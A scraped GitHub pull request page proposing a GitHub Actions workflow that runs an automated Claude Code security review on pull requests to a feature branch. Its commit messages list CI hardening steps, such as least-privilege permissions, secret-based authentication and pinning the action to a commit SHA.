ci: add Claude Code security review workflow for PRs to feature/darwin#49
Open
Sarath1018 wants to merge 2 commits into
Open
ci: add Claude Code security review workflow for PRs to feature/darwin#49Sarath1018 wants to merge 2 commits into
Sarath1018 wants to merge 2 commits into
Conversation
Adds a pull_request-triggered GitHub Actions workflow that runs an automated, security-focused Claude Code review on PRs targeting feature/darwin. Hardening per the CI/CD security checklist: - uses pull_request (not pull_request_target) so untrusted PR code never runs with secret access; forked PRs are skipped - least-privilege permissions (contents:read; pull-requests/issues:write) - auth via CLAUDE_CODE_OAUTH_TOKEN secret, no hardcoded credentials - no untrusted github.event.* values interpolated into run: steps Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
Pin anthropics/claude-code-action to the v1 commit SHA so a re-tagged or compromised tag can't silently change the action that runs with repo access. Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Adds a pull_request-triggered GitHub Actions workflow that runs an automated, security-focused Claude Code review on PRs targeting feature/darwin.
Hardening per the CI/CD security checklist:
Description
[Provide a brief description of the changes in this PR]
How Has This Been Tested?
[Describe the tests you ran to verify your changes]
Backporting (check the box to trigger backport action)
Note: You have to check that the action passes, otherwise resolve the conflicts manually and tag the patches.